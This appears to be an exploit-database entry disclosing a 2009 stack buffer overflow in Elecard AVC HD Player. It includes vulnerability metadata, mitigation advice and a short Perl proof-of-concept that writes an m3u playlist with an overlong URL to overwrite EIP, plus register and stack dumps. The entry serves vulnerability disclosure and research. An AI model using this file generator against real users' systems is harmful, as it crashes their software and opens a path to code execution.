Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC

vendor:

AVC HD PLAYER

by:

AlpHaNiX

9.3

CVSS

HIGH

Stack Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: AVC HD PLAYER

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC

Elecard AVC HD PLAYER is prone to a local stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Elecard AVC HD PLAYER.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC
#Found By AlpHaNiX
#From NullArea.Net
###########################
#    proof of concept    
###########################
#Stack Get Overflowed Starting from 2353 char
#EIP overitten
#------------------
#     REGISTRES   
#------------------
#EAX 00000000
#ECX 41414141
#EDX 775A104D ntdll.775A104D
#EBX 00000000
#ESP 0012BC9C
#EBP 0012BCBC
#ESI 00000000
#EDI 00000000
#EIP 41414141
#------------------
#  Dump From Stack
#------------------
#0012D000   41414141
#0012D004   41414141
#0012D008   41414141
#0012D00C   41414141
#0012D010   41414141
#0012D014   41414141
#0012D018   41414141
#0012D01C   41414141
#0012D020   41414141
#0012D024   41414141
#0012D028   41414141

my $file = "alpix.m3u" ;
my $poc="http://"."A" x 2353 ;
open(alpix, ">>$file") or die "Cannot open $file";
print alpix $poc;
close(alpix);
print "\n[+] done ! , $file created";

# milw0rm.com [2009-02-02]